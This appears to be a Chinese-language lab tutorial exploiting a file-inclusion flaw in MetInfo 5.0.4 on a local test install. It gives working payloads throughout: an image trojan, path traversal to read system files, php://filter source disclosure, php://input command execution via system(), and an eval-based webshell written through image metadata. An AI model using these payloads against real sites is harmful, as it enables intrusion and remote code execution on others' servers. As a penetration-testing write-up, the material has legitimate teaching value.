感謝互聯(lián)網(wǎng)提供分享知識與智慧，在法治的社會里，請遵守有關(guān)法律法規(guī)

以 metinfo_5.0.4為例

該環(huán)境的文件上傳點在admin路徑下

但是上傳文件會失敗，

所以直接在網(wǎng)站的upload\file下放入圖片木馬

---

文件包含漏洞利用點：/about/index.php?fmodule=7&module=[filePath]

1、蟻劍直接連接圖片馬

圖片馬制作：

copy 1.jpg/b+1.php/a 22.jpg

上傳圖片木馬，通過文件包含的方式去訪問

http://127.0.0.1/MetInfo5.0.4//about/index.php?fmodule=7&module=../upload/file/22.jpg

使用蟻劍連接

2、讀取敏感目錄

http://127.0.0.1/MetInfo5.0.4//about/index.php?fmodule=7&module=../../../../../../../../../../../windows/system32/drivers/etc/hosts

3、讀取php源碼

http://127.0.0.1/MetInfo5.0.4/about/index.php?fmodule=7&module=php://filter/read=convert.base64-encode/resource=show.php

讀取結(jié)果：

PD9waHANCiMgTWV0SW5mbyBFbnRlcnByaXNlIENvbnRlbnQgTWFuYWdlbWVudCBTeXN0ZW0gDQojIENvcHlyaWdodCAoQykgTWV0SW5mbyBDby4sTHRkIChodHRwOi8vd3d3Lm1ldGluZm8uY24pLiBBbGwgcmlnaHRzIHJlc2VydmVkLiANCnJlcXVpcmVfb25jZSAnLi4vaW5jbHVkZS9jb21tb24uaW5jLnBocCc7DQppZighJGlkICYmICRjbGFzczEpJGlkID0gJGNsYXNzMTsNCiRzaG93ID0gJGRiLT5nZXRfb25lKCJTRUxFQ1QgKiBGUk9NICRtZXRfY29sdW1uIFdIRVJFIGlkPSRpZCBhbmQgbW9kdWxlPTEiKTsNCmlmKCEkc2hvd3x8ISRzaG93Wydpc3Nob3cnXSl7DQpva2luZm8oJy4uLzQwNC5odG1sJyk7DQp9DQokbWV0YWNjZXNzPSRzaG93W2FjY2Vzc107DQppZigkc2hvd1tjbGFzc3R5cGVdPT0zKXsNCiRzaG93MyA9ICRkYi0+Z2V0X29uZSgiU0VMRUNUICogRlJPTSAkbWV0X2NvbHVtbiBXSEVSRSBpZD0nJHNob3dbYmlnY2xhc3NdJyIpOw0KJGNsYXNzMT0kc2hvdzNbYmlnY2xhc3NdOw0KJGNsYXNzMj0kc2hvd1tiaWdjbGFzc107DQokY2xhc3MzPSRzaG93W2lkXTsNCn1lbHNlew0KJGNsYXNzMT0kc2hvd1tiaWdjbGFzc10/JHNob3dbYmlnY2xhc3NdOiRpZDsNCiRjbGFzczI9JHNob3dbYmlnY2xhc3NdPyRpZDoiMCI7DQokY2xhc3MzPTA7DQp9DQoNCnJlcXVpcmVfb25jZSAnLi4vaW5jbHVkZS9oZWFkLnBocCc7DQokY2xhc3MxX2luZm89JGNsYXNzX2xpc3RbJGNsYXNzMV07DQokY2xhc3MxX2xpc3Q9JGNsYXNzMV9pbmZvOw0KJGNsYXNzMl9pbmZvPSRjbGFzc19saXN0WyRjbGFzczJdOw0KJGNsYXNzM19pbmZvPSRjbGFzc19saXN0WyRjbGFzczNdOw0KJHNob3dbY29udGVudF09Y29udGVudHNob3coJzxkaXY+Jy4kc2hvd1tjb250ZW50XS4nPC9kaXY+Jyk7DQokc2hvd1tkZXNjcmlwdGlvbl09JHNob3dbZGVzY3JpcHRpb25dPyRzaG93W2Rlc2NyaXB0aW9uXTokbWV0X2tleXdvcmRzOw0KJHNob3dba2V5d29yZHNdPSRzaG93W2tleXdvcmRzXT8kc2hvd1trZXl3b3Jkc106JG1ldF9rZXl3b3JkczsNCiRtZXRfdGl0bGU9JG1ldF90aXRsZT8kc2hvd1snbmFtZSddLictJy4kbWV0X3RpdGxlOiRzaG93WyduYW1lJ107DQppZigkc2hvd1snY3RpdGxlJ10hPScnKSRtZXRfdGl0bGU9JHNob3dbJ2N0aXRsZSddOw0KcmVxdWlyZV9vbmNlICcuLi9wdWJsaWMvcGhwL21ldGh0bWwuaW5jLnBocCc7DQppbmNsdWRlIHRlbXBsYXRlKCdzaG93Jyk7DQpmb290ZXIoKTsNCiMgVGhpcyBwcm9ncmFtIGlzIGFuIG9wZW4gc291cmNlIHN5c3RlbSwgY29tbWVyY2lhbCB1c2UsIHBsZWFzZSBjb25zY2lvdXNseSB0byBwdXJjaGFzZSBjb21tZXJjaWFsIGxpY2Vuc2UuDQojIENvcHlyaWdodCAoQykgTWV0SW5mbyBDby4sIEx0ZC4gKGh0dHA6Ly93d3cubWV0aW5mby5jbikuIEFsbCByaWdodHMgcmVzZXJ2ZWQuDQo/

得出base64編碼格式的數(shù)據(jù)，使用bp的Decoder功能進行base64解碼

也可以利用HackBar瀏覽器插件

復(fù)制得到的base64編碼格式的php代碼

點擊 OK

解碼成功！

4、執(zhí)行PHP命令

bp攔截得到php源碼的數(shù)據(jù)包

發(fā)送到Repeater模塊

把GET包該成POST數(shù)據(jù)包

得到POST數(shù)據(jù)包

把POST請求體中的變量放到url中提交

雖然說是POST數(shù)據(jù)包，但是POST數(shù)據(jù)包的url中也可以用GET參數(shù)

把fmodule=7&module=的值改成php://input，然后在下面寫入php代碼，點擊send

<?php phpinfo();?>

執(zhí)行系統(tǒng)代碼

<?php 
system("whoami")
?>

<?php 
system("ipconfig")
?>

5、包含木馬寫Shell （圖片馬制作新方法）

<?php fputs(fopen("shell.php",'w'),'<?=@eval($_REQUEST[777]);phpinfo();?>')?>

該段代碼的含義是，在當(dāng)前目錄下創(chuàng)建一個名為shell.php的文件，內(nèi)容為<?php phpinfo();?>，當(dāng)我們直接包含圖片的時候，這段代碼就會被執(zhí)行

重新再upload\file下放入一張沒有木馬的圖片，使用另一種方式制作圖片木馬

點擊圖片---右鍵屬性---詳細信息

點擊應(yīng)用，點擊確定

在瀏覽器中訪問圖片http://127.0.0.1/MetInfo5.0.4/upload/file/1.jpg，圖片正常顯示

使用文件包含的方式去訪問圖片

http://127.0.0.1/MetInfo5.0.4/about/index.php?fmodule=7&module=../upload/file/1.jpg

頁面顯示如下：

隨即發(fā)現(xiàn)在upload文件夾中有個新建文件shell.php，即可用蟻劍連接

拿到webshell